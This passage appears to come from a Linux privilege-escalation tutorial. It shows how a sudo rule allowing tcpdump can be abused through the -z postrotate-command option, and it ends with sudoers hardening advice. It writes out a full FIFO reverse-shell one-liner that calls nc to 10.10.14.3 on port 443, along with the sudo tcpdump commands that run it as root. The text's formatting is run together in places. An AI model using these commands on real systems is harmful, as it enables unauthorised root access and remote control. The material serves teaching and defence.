man tcpdump
<SNIP>
-z postrotate-command
Used in conjunction with the -C or -G options, this will make `tcpdump` run " postrotate-command file " where the file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z rootcat /tmp/.test
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/fsudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z rootAppArmor in more recent distributions has predefined the commands used with the postrotate-command, effectively preventing command execution. Two best practices that should always be considered when provisioning sudo rights:
- Always specify the absolute path to any binaries listed in the
sudoersfile entry. Otherwise, an attacker may be able to leverage PATH abuse (which we will see in the next section) to create a malicious binary that will be executed when the command runs (i.e., if thesudoersentry specifiescatinstead of/bin/catthis could likely be abused).| - Grant
sudorights sparingly and based on the principle of least privilege. Does the user need fullsudorights? Can they still perform their job with one or two entries in thesudoersfile? Limiting the privileged command that a user can run will greatly reduce the likelihood of successful privilege escalation.